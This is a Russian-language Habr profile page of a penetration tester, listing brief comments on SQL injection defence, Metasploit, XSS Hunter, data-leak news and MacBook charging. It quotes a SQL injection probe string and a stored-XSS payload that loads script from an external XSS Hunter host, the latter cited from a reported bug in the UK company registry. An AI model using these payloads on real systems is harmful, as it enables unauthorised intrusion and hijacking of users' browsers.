Pull to refresh
234.3
Karma
0
Rating
Лука Сафонов @LukaSafonov

information security, penetration testing

Вы пользуетесь уязвимым софтом, но я вам не могу об этом рассказать

Скоро на Bug Bounty Ru, пока можете написать на info@bugbounty.ru.

SQL-инъекции' union select null,null,null --

На уровне базы данных могут не поддерживаются привязанные переменные, поэтому необходимо использовать другие варианты.

Вот примеры с PHP: www.php.net/manual/ru/security.database.sql-injection.php

SQL-инъекции' union select null,null,null --

способов предотвращения SQL-инъекций два:
• не использовать динамические запросы к базе;
• не использовать пользовательские данные.

Учите матчасть:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense

cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Что такое Metasploit? Руководство для начинающих

NOP служат для «обхода» антивирусных средств, но это уже устаревшая техника.

Установка XSS Hunter

Зачем тогда разворачивать собственный сервис для этой задачи, спросите вы.

0. Чтобы не нарушать NDA и не кидать данные по пентесту направо налево.

Что такое Metasploit? Руководство для начинающих

Остановил чтение здесь:

image

В британском реестре компаний обнаружили XSS

При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>

Как заряжать макбук

Ссылка в посте есть, информация многим может быть полезна, чего-то еще высасывать из пальца нет смысла. Можно было бы обойтись двумя строками текста, но хабр не твиттер.

Как заряжать макбук

Как заряжать макбук

Для версий Mac Book Pro без тачбара с двумя портами слева — зарядку необходимо использовать в верхнем порту.

Как заряжать макбук

а мужики-то не знают.

В даркнет утекла база данных проголосовавших по поправкам в Конституцию на 1,1 миллиона записей

Такую «базу» можно и нагенерить, она содержит записи типа ХХ ХХ ХХХХХХ. В подарок купившему дают базу ALL CREDIT CARD PIN CODES IN THE WORLD LEAKED.

В сети продают базу с данными 5 млн студентов и сотрудников Skyeng за 40 тысяч рублей

Ага, дело не монге, но пароли в «вашей» бд вы храните (хранили в 2019) plaintext’ом. Теперь поинт вызвал доверие?

В сети продают базу с данными 5 млн студентов и сотрудников Skyeng за 40 тысяч рублей

Немудрено, учитывая их «отношение» к багхантерам. О багах, приводящих к утечке пользователей в прошлом году сообщили минимум три человека, полученные ответы: дубль, это не продуктовая база и в таком духе. Вот и результат (=.

Консорциум OWASP обновил Web Security Testing Guide

Сергей, с последней версией 4.1 он стал Web Security Testing Guide.

Kali Linux 2020.1

DE — desktop environment. Ошибки поправил. К сожалению переводить/дополнять особо нечем, такими темпами Kali скоро будут раздавать в виде дефолтового Debian/Ubuntu с набором обоев с драконами.

Подбор пароля Wi-Fi утилитой aircrack-ng

Сейчас точно 2019 год?

«Мамкины хакеры» на официальной работе: чем занимаются пентестеры

Распедалил по-взрослому. Респект, Сергей!

Information

Rating
3,515-th
Location
Москва, Москва и Московская обл., Россия
Works in
Date of birth
Registered
Activity